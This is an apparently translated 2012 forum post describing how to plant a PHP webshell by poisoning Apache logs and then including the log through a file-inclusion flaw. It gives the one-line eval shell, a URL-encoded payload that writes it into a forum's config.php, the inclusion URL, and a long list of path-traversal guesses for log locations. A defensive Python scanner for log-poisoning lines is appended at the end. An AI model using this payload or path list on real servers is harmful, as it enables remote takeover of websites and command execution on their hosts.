Writing a webshell through a PHP include of the Apache log

Original poster, posted 2012-9-15 14:27:40
Because the method above is not very practical (in my testing the logs were routinely tens of megabytes, which takes the fun out of it), let's think a bit further and write a real, usable webshell instead; that is far better than the painfully slow approach above.

Take the same one-line shell, for example:
<?eval($_POST[cmd]);?>

By now you may already have thought of it: this is a pretty good approach. Read on, though, because how to write it to a file becomes the question. Use this statement: fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then the one-line server-side shell <?eval($_POST[cmd]);?> is written into it. Put together as a PHP statement, that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?>   // write the one-line shell into config.php

We submit this, let Apache record it in the error log, then include the log, and the shell is written. Remember it must be converted to URL-encoded form or it will not work. Converted:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

The error log now holds this line of webshell-writing code. We include the log again by submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

With that the webshell is written: config.php now contains the one-line shell.
OK.
http://www.xxx.com/forum/config.php is now our webshell.
Connect to it with lanker's client and the host is yours.

PS: everything above presupposes that the directory permissions are writable; it has to be -rwxrwxrwx (777) to proceed, and here I simply used the directory listed above to check. Everything above is exploitation with the log path already known.

For other log paths you can guess, or refer to the list here:
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
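A defender-side check for the poisoning step this post relies on, added here as an example and not code from the original post: it percent-decodes each Apache log line (so the raw access_log request and the already-decoded error_log entry both match) and flags lines that carry a PHP open tag together with a code-writing or code-executing call. The log lines and the list of flagged calls are constructed for the example.

```python
"""Spot Apache log-poisoning attempts (PHP tag + dangerous call in a log line).
Added example, not from the original post. Lines are percent-decoded first so
raw access_log entries and already-decoded error_log entries both match."""
import re
from urllib.parse import unquote

# Calls a poisoning payload needs to write or run code; constructed list.
DANGEROUS_CALLS = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open|"
    r"fopen|fputs|fwrite|file_put_contents|include|require)\s*\(",
    re.IGNORECASE,
)
PHP_OPEN_TAG = re.compile(r"<\?(php|=)?", re.IGNORECASE)

def normalize(line: str, passes: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are unwrapped too."""
    for _ in range(passes):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line

def is_poisoning_attempt(line: str) -> bool:
    """True when the decoded line carries a PHP open tag plus a dangerous call."""
    text = normalize(line)
    return bool(PHP_OPEN_TAG.search(text) and DANGEROUS_CALLS.search(text))

def scan_log(lines):
    """Return (line_number, decoded_line) for every suspicious entry."""
    return [(n, normalize(raw)) for n, raw in enumerate(lines, 1)
            if is_poisoning_attempt(raw)]

# Constructed sample lines (not from any real server): a normal request, a
# plain 404, the one-line shell as a raw percent-encoded request (access_log
# form) and as Apache records it in error_log, where the path is already decoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Sep/2012:14:27:40 +0800] "GET /forum/index.php HTTP/1.1" 200 5123',
    '203.0.113.5 - - [15/Sep/2012:14:28:01 +0800] "GET /missing.html HTTP/1.1" 404 209',
    '203.0.113.5 - - [15/Sep/2012:14:28:30 +0800] "GET /%3C%3Feval%28%24_POST%5Bcmd%5D%29%3B%3F%3E HTTP/1.1" 404 209',
    '[Sat Sep 15 14:28:30 2012] [error] [client 203.0.113.5] File does not exist: /var/www/html/<?eval($_POST[cmd]);?>',
]

if __name__ == "__main__":
    for n, decoded in scan_log(SAMPLE_LOG):
        print(f"line {n}: possible log poisoning -> {decoded}")
```

Run it against a real access_log or error_log by passing the file's lines to scan_log; a hit on a 404 line is the signature of someone seeding the log before an include.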